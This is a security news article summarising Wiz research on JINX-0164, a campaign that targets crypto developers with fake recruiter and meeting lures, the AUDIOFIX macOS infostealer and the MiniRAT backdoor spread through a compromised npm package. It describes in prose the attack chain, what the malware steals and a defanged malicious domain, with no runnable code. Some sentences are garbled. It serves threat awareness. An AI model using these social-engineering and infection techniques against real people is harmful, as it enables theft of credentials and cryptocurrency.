A new campaign, orchestrated by a previously undocumented threat actor, targets crypto organizations with the goal of facilitating the theft of digital assets using recruitment-themed social engineering and custom-built macOS malware.
“These campaigns utilized advanced social engineering techniques, custom macOS malware, and deep targeting of CI/CD infrastructure,” said Wiz researchers Shira Ayal, Eden Abergil, Andre Maccarone, Yuval Dunn, and Benjamin Reed. “The techniques used allowed the attacker to move laterally from the compromised employee’s laptop to code distribution systems and development infrastructure.”
Google’s cloud security company is tracking this activity under the name JINX-0164. This threat actor has been active since at least mid-2025 and has been assessed for financial gain, targeting developers through recruiting themes and other social engineering techniques to siphon cryptocurrencies. In at least one case, adversaries are said to have carried out supply chain attacks.
The attack chain documented by Wiz shows JINX-0164 leveraging trusted LinkedIn profiles to approach victims and offer virtual meetings. The meeting invitation is designed to direct the target to a fraudulent domain masquerading as a teleconferencing provider.
From there, victims are tricked into downloading and installing the program. This triggers the acquisition of a Python-based macOS infostealer and remote access Trojan codenamed AUDIOFIX using a bash script hosted on a fake driver store domain (‘apple.driver-store’).[.]com”).
” [bash] The script downloaded an architecture-aware payload from the same domain that is compatible with both Intel and Apple Silicon systems. The payload masqueraded as a system audio driver named coreaudiod, was saved as ChromeUpdater, and was executed via launchctl,” Wiz said.
It then leverages Python malware to steal sensitive data from compromised endpoints, move laterally to internal code distribution systems and development infrastructure by injecting AUDIOFIX payloads, and modify source code in order to compromise other endpoints and steal cryptocurrency wallet credentials.
Captured data includes credentials from password managers, web browsers, and iCloud Keychain files. Local administrator credentials. SSH key. configuration file. Console history file. Cryptocurrency browser extension information. Cryptocurrency wallet address. Active Discord, Slack, and Telegram sessions.
In addition to information theft, AUDIOFIX supports several commands that allow manual reconnaissance, extraction, execution of arbitrary shell commands, deletion of files, and retrieval of payloads from external servers.
JINX-0164 has also been observed targeting software developers by impersonating recruiters while using the same social engineering techniques. That is, they use the opportunity to set up a meeting where they display a fake technical error and instruct the victim to download a “fix” that leads to the installation of malware.
Another key component in a threat actor’s arsenal is the MiniRAT. This is a Go-based backdoor that was previously distributed via a compromised version of an npm package named @velora-dex/sdk, a legitimate DeFi toolkit used for token swaps, limit orders, and delta trading on the VeloraDEX decentralized exchange platform.
According to details shared by SafeDep and StepSecurity last month, the compromised version downloaded a shell script from a remote server and then distributed a macOS-specific binary called MiniRAT. The malware has the ability to upload files, execute arbitrary shell commands, and obtain additional payloads and tools from attacker-controlled domains.
It is notable that some aspects of the campaign, coupled with the use of VPN services such as Astrill VPN and the focus on cryptocurrencies and developers, are reminiscent of those used by multiple North Korean threat clusters such as BlueNoroff, Contagious Interview, and UNC1069. However, Wiz said that at this stage there is no overlap in the infrastructure connecting JINX-0164 and Pyongyang.
“Similarly, while the types of spoofed domains are similar to those used by other North Korean threat actors, JINX-0164’s infrastructure has no overlap with other publicly tracked North Korean groups,” With said.
Source link
